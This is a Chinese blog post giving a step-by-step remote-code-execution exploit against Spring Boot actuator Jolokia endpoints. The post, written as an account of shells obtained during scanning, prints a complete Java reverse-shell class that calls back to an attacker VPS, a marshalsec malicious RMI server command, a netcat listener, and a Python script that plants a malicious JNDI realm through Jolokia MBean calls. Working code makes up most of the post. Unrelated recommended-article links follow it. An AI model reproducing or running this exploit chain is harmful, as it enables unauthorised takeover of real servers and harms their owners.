日穿扫描扫到一个spring boot actuator

可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字



可以使用jolokia-realm-jndi-rce具体步骤如下

先用python3开一个web服务

python3 -m http.server 8080

编译java利用代码

/**

 *  javac -source 1.5 -target 1.5 JNDIObject.java

 *

 *  Build By LandGrey

 * */

import java.io.File;

import java.io.InputStream;

import java.io.OutputStream;

import java.net.Socket;

public class JNDIObject {

    static {

        try{

            String ip = "your-vps-ip";

            String port = "443";

            String py_path = null;

            String[] cmd;

            if (!System.getProperty("os.name").toLowerCase().contains("windows")) {

                String[] py_envs = new String[]{"/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};

                for(int i = 0; i < py_envs.length; ++i) {

                    String py = py_envs[i];

                    if ((new File(py)).exists()) {

                        py_path = py;

                        break;

                    }

                }

                if (py_path != null) {

                    if ((new File("/bin/bash")).exists()) {

                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"};

                    } else {

                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"};

                    }

                } else {

                    if ((new File("/bin/bash")).exists()) {

                        cmd = new String[]{"/bin/bash"};

                    } else {

                        cmd = new String[]{"/bin/sh"};

                    }

                }

            } else {

                cmd = new String[]{"cmd.exe"};

            }

            Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();

            Socket s = new Socket(ip, Integer.parseInt(port));

            InputStream pi = p.getInputStream();

            InputStream pe = p.getErrorStream();

            InputStream si = s.getInputStream();

            OutputStream po = p.getOutputStream();

            OutputStream so = s.getOutputStream();

            while(!s.isClosed()) {

                while(pi.available() > 0) {

                    so.write(pi.read());

                }

                while(pe.available() > 0) {

                    so.write(pe.read());

                }

                while(si.available() > 0) {

                    po.write(si.read());

                }

                so.flush();

                po.flush();

                Thread.sleep(50L);

                try {

                    p.exitValue();

                    break;

                } catch (Exception e) {

                }

            }

            p.destroy();

            s.close();

        }catch (Throwable e){

            e.printStackTrace();

        }

    }

}


javac -source 1.5 -target 1.5 JNDIObject.java

架设恶意 rmi 服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#JNDIObject 1389

监听端口

nc -lvp 443



执行exp

#!/usr/bin/env python3

# coding: utf-8

# Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt

import requests

url = 'http://127.0.0.1:8080/jolokia'

create_realm = {

    "mbean": "Tomcat:type=MBeanFactory",

    "type": "EXEC",

    "operation": "createJNDIRealm",

    "arguments": ["Tomcat:type=Engine"]

}

wirte_factory = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "WRITE",

    "attribute": "contextFactory",

    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"

}

write_url = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "WRITE",

    "attribute": "connectionURL",

    "value": "rmi://your-vps-ip:1389/JNDIObject"

}

stop = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "EXEC",

    "operation": "stop",

    "arguments": []

}

start = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "EXEC",

    "operation": "start",

    "arguments": []

}

flow = [create_realm, wirte_factory, write_url, stop, start]

for i in flow:

    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))

    r = requests.post(url, json=i)

    r.json()

    print(r.status_code)


python3 springboot-realm-jndi-rce.py



然后等两秒shell就回来了

那些年拿过的shell之springboot jolokia rce的更多相关文章

  1. springboot打包不同环境配置与shell脚本部署

    本篇和大家分享的是springboot打包并结合shell脚本命令部署,重点在分享一个shell程序启动工具,希望能便利工作: profiles指定不同环境的配置 maven-assembly-plu ...

  2. Shell脚本 自动部署 SpringBoot 应用

    公司项目使用了SpringBoot.开发的应用需要自动上传到服务器.虽然目前对热部署还没完全掌握.先使用shell简化一下部署吧. # 上传密钥 sshLoginKey=/f/MyFile/root. ...

  3. 【springboot】之利用shell脚本优雅启动,关闭springboot服务

    springbot开发api接口服务,生产环境中一般都是运行独立的jar,在部署过程中涉及到服务的优雅启动,关闭, springboot官方文档给出的有两种方式, 1.使用http shutdown ...

  4. 在idea中编写自动拉取、编译、启动springboot项目的shell脚本

    idea 开发环境搭建 idea中安装shell开发插件 服务器具备的条件 已经安装 lsof(用于检查端口占用) 已安装 git 安装 maven 有 java 环境 背景 代码提交到仓库后,需要在 ...

  5. 编写shell脚本让springboot项目在CentOS中开机自启动

    springboot项目部署在CentOS系统上时,如果遇到停电关机,公司的实施人员就得跑到甲方现场重新启动项目并测试,很是麻烦,这里探讨如何编写shell脚本控制springboot项目开机时自动启 ...

  6. Dockerfile 构建后端springboot应用并用shell脚本实现jenkins自动构建

    Dockerfile 文件构建docker镜像 FROM centos MAINTAINER zh*****eng "z*******ch.cn" ENV LANG en_US.U ...

  7. SpringBoot打成的jar包发布,shell关闭之后一直在服务器运行

    1:可以编写shell脚本, 切换到执行的jar包目录,然后使用nohup  让改命令在服务器一直运行 #!/bin/bash cd /srv/ftp/public nohup java -jar l ...

  8. springboot使用api操作HBase之shell

    HBase的基本读写流程写入流程读取流程HBase的模块与协作HBase启动RegionServer失效HMaster失效HBase常用的Shell命令进入shellhelp命令查询服务器状态查看所有 ...

  9. 编写shell脚本,使用 nohup 让springboot 项目在后台持续运行

    1.将springboot项目打成jar放在linux的某个目录下. 2.新建一个nohup.log文件. 3.使用vi命令新建一个start.sh文件并写下以下内容: #!/bin/sh nohup ...

随机推荐

  1. 你真的了解CSS继承吗?看完必跪

    也许你瞧不起以前的 css ,但是你不该再轻视眼下的 css .近年来 css 的变量系统已逐步得到各大浏览器厂商支持,自定义选择器等强势袭来,嵌套系统/模块系统也在路上…为了更好的掌握 css 这门 ...

  2. 优化:在k8s上部署的gitlab

    gitlab组件图 gitlab在k8s上占用资源 # kubectl top pods -n default | grep git* gitlab-gitaly-0 9m 444Mi gitlab- ...

  3. 每日一题 - 剑指 Offer 45. 把数组排成最小的数

    题目信息 时间: 2019-07-01 题目链接:Leetcode tag: 快速排序 难易程度:中等 题目描述: 输入一个非负整数数组,把数组里所有数字拼接起来排成一个数,打印能拼接出的所有数字中最 ...

  4. 「MoreThanJava」Day 3:构建程序逻辑的方法

    「MoreThanJava」 宣扬的是 「学习,不止 CODE」,本系列 Java 基础教程是自己在结合各方面的知识之后,对 Java 基础的一个总回顾,旨在 「帮助新朋友快速高质量的学习」. 当然 ...

  5. Django---进阶12

    目录 Auth模块 方法总结 如何扩展auth_user表 项目开发流程 表设计 作业 Auth模块 """ 其实我们在创建好一个django项目之后直接执行数据库迁移命 ...

  6. C#foreach原理

    本文主要记录我在学习C#中foreach遍历原理的心得体会. 对集合中的要素进行遍历是所有编码中经常涉及到的操作,因此大部分编程语言都把此过程写进了语法中,比如C#中的foreach.经常会看到下面的 ...

  7. python 将指定文件夹中的指定文件放入指定文件夹中

    import os import shutil import re #获取指定文件中文件名 def get_filename(filetype): name =[] final_name_list = ...

  8. 数据库/MySQL的安装

    来源:https://www.cnblogs.com/liubing8/p/11431382.html mysql的安装.启动和基础配置 —— windows版本 1.下载 第一步:打开网址,http ...

  9. 00-Windows系统MySQL数据库的安装

    1.数据库安装 官网下载MySQL数据库. 下载安装包后解压缩到相关目录,我解压缩到:D:\360极速浏览器下载\mysql-8.0.19-winx64. 打开刚刚解压的文件夹 D:\360极速浏览器 ...

  10. 邂逅Vue.js

    1.简单认识一下Vue.js Vue (读音 /vjuː/,类似于 view),不要读错. Vue是一个渐进式的框架,什么是渐进式的呢? p渐进式意味着你可以将Vue作为你应用的一部分嵌入其中,带来更 ...